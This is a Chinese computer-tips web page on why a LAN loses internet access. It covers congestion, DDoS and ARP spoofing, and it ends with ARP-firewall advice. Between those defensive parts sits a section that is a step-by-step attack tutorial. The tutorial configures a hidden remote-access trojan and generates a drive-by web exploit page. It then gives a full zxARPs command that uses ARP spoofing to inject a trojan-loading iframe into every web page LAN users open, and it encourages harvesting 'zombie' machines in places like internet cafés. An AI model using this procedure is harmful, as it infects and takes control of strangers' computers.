热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

局域网不能上网的原因

2013-09-12 15:54:05  来源: 网络技术 

  引起局域网与外网间通讯中断的因素,如果排除掉ISP运营商和外网攻击的可能性,那问题多半就在局域网内部。最常见的因素有三:
  一、网络拥塞,比如有用户大量使用BT等P2P软件抢占带宽,就会影响其他人的正常使用。
  二、网络硬件有故障,如交换机的某几个接口模块损坏,无法正常收发数据包也会造成网络阻塞。
  三、病毒引起的断网,常见的有DDoS(或DoS)攻击和ARP攻击。
  前两类故障的甄别都有相应的方法可以做到,但离题太远我们这里不做描述,我们只分析病毒引起的断网故障。
  DDoS攻击是在DoS攻击的基础上借助客户/服务器技术(图1),将多个计算机联合起来作为攻击平台,对目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。一般病毒在局域网内发起此类攻击时,表现为网络中充斥着大量无用的数据包,网络阻塞,局域网用户ping路由网关会严重掉包。www.sq120.com推荐文章
  小知识:DoS又叫拒绝服务,是Denial of Service的简称,DoS攻击简单说就是使计算机或网络无法提供正常服务的一种攻击方式。通常DoS攻击可分为计算机网络带宽攻击和连通性攻击两种。
  接下来就是ARP攻击,这种攻击有多种方式,ARP欺骗可以把自己的主机伪造成一个中间转发站来监听两台主机之间的通信,另外MAC Flooding和基于ARP的DoS攻击都可以引发网络通讯中断。WWw.ItCOmpuTer.Com.cn
  其中基于ARP的DoS攻击很有欺骗性,在被攻击主机上不会出现真实的IP。此类病毒发作时,中毒的机器会伪造某台电脑的MAC地址,如果该伪造地址为网关服务器的地址,就会对整个局域网造成影响,出现不规律的断网,但在一定时间内可能又会恢复(图2)。同时也可能伴随着ping路由网关严重掉包,访问外网速度严重受阻等情况。

用“arp –a”查看ARP列表

  小知识:ARP是地址解析协议,基本功能是通过目标设备的IP地址查询目标设备的MAC地址,以保证通信顺利进行。

 
如何在局域网挂arp木马

  网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何倍数增长。
  局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中木马。看了上面的介绍,各位是不是已经蠢蠢欲动了?
第一步:配置木马服务端
  我们以《黑洞》木马为例。运行《黑洞》木马的Client.exe文件,进入Client.exe的主界面后,点击“文件→创建DLL插入版本服务端程序”。
  进入服务端程序的创建界面后,首先勾选“Win NT/2000/XP/2003下隐藏服务端文件、注册表、进程和服务”,然后切换到“连接选项”标签,在“主机”一栏中填入本机的公网IP地址,端口可以保持默认的“2007”。最后在“连接密码”处填入用来连接对方的密码,例如123456。设置完成后点击“生成”按钮,将木马服务端保存为muma.exe。

第二步:生成网页木马
  既然是挂马,那当然缺不了网页木马了。这里我们用“MS07-33网马生成器”为例。运行“MS07-33网马生成器”,在“网马地址”文本框中输入木马所在路径,由于等会我们要自行架设HTTP服务,所以这里应该填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本机在局域网中的IP地址。点击“生成网马”按钮即可生成网马hackll.htm。

第三步:开启本机HTTP服务
  要让局域网中的其他主机能够访问到我们的网马,就要开启本机的Http服务。下载Baby Web Server,这是一款简单的Web服务器软件,下载后直接运行,在其主界面中点击“服务→设置”。
  将“网页目录”设置为网页木马所在的地方,例如C盘根目录“C:\“。点“确定”回主界面,然后再点“Start”按钮开启本机的Http服务。记住要将木马服务端和网页木马放到C盘根目录。

第四步:局域网挂马
  最后该请我们的主角出场了,就是上文中提到的小工具,这个工具叫zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包,没有它zxARPs就运行不了。
  安装好后将zxARPs放到任意目录,然后运行“命令提示符”,进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘http://192.168.0.2/hackll.htm’ width=0 height=0>”。回车后挂马就成功了。
  从现在开始,局域网中的用户无论访问什么网站,都会运行我们的网页木马,因为zxARPs在用户打开网页的同时已经将挂马代码插入到正常网页中了。

 
局域网断网的原因分析 问: 最近我的电脑经常掉线,以为是arp病毒,装了arp防火墙,但是ARP防火墙没有检测到攻击,但我仍然会掉线(断网)?

答: 原因有几种:
1.可能是攻击者只向网关发送了ARP攻击数据包,所以ARP防火墙没有检测到攻击。解决办法:建议用户把“主动防御”功能设置为“始终运行”,并且把防御速度设置到最大:100。
2.ARP防火墙在启动之前,机器就已经处于攻击之下,ARP防火墙自动取到的网关MAC地址是假的。解决办法:咨询网管人员,获取网关的正确MAC,然后在ARP防火墙中手动设置网关的IP/MAC。
3. 如果上述两个办法都不可行,那么估计掉线原因就跟ARP攻击没有关系了,毕竟造成掉线的原因有很多,如:硬件问题、线路问题、应用程序(如游戏)本身的问题等等。  
From:http://www.itcomputer.com.cn/Article/Network/201309/473.html
    Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.